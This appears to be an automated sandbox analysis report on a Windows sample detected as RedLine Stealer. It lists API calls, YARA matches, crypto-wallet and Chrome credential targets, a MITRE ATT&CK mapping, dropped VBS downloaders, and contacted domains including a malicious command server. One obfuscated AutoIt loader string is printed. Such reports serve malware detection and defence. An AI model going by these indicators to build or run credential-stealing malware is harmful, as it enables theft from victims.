Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_004029DA ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??3@YAXPAX@Z,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,

0_2_004029DA

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C8E419 GetUserNameW,

7_2_00C8E419

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C6BF8F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

7_2_00C6BF8F

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_00406128 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,GetCommandLineW,GetCommandLineW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,??3@YAXPAX@Z,lstrlenW,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00406128

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumRule
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682612254.00000000053C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: $CZTUWlJaxXNQi = Execute(urjDlX("80<95<118<108<48<92<95<76<129<86<75<75<127<119<95<84<73<126<49",8))
Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum#\Ethereum\wallets
Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusRule
Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: EthereumRule

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Source: Inebriato.exe.com	Binary or memory string: WIN_81
Source: Inebriato.exe.com	Binary or memory string: WIN_XP
Source: Uno.exe.com, 0000000A.00000000.1707241910.0000000000AC3000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Inebriato.exe.com	Binary or memory string: WIN_XPe
Source: Inebriato.exe.com	Binary or memory string: WIN_VISTA
Source: Inebriato.exe.com	Binary or memory string: WIN_7
Source: Inebriato.exe.com	Binary or memory string: WIN_8

Source: Yara match	File source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CB204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	7_2_00CB204C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CB1A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	7_2_00CB1A4A
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A8204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	10_2_00A8204C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A81A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	10_2_00A81A4A
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0062204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	13_2_0062204C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00621A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	13_2_00621A4A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	312 Scripting	2 Valid Accounts	1 Native API	312 Scripting	1 Exploitation for Privilege Escalation	211 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Create Account	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	121 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	2 Valid Accounts	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	36 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Scheduled Task/Job	312 Process Injection	113 Masquerading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Users	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
8lOT1rXZp5.exe	54%	Virustotal		Browse
8lOT1rXZp5.exe	53%	ReversingLabs	Win32.Trojan.Valyria

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\UeNuQ\939.vbs	100%	Avira	VBS/Dldr.Agent.VPGN
C:\Users\user\AppData\Roaming\UeNuQ\578.vbs	100%	Avira	VBS/Agent.4358
C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	5%	ReversingLabs
C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	5%	ReversingLabs
C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	5%	ReversingLabs

Source	Detection	Scanner	Label	Link
21jhss.club:80	100%	Avira URL Cloud	malware
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
raw.githubusercontent.com	185.199.111.133	true	false	high
lYvskCQZEcQueZ.lYvskCQZEcQueZ	unknown	unknown	true	unknown
bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTv	unknown	unknown	true	unknown
21jhss.club	unknown	unknown	true	unknown
QPFIkBuKoDrrKMiLWzroGJvlan.QPFIkBuKoDrrKMiLWzroGJvlan	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdate.bat	false		high
21jhss.club:80	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmp, Rifiutare.exe.com, 00000009.00000000.1706363695.0000000000D05000.00000002.00000001.01000000.00000006.sdmp, Uno.exe.com, 0000000A.00000000.1707300131.0000000000AD5000.00000002.00000001.01000000.00000007.sdmp	false		high
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupda	wscript.exe	false		high
https://www.autoitscript.com/autoit3/	8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	false		high
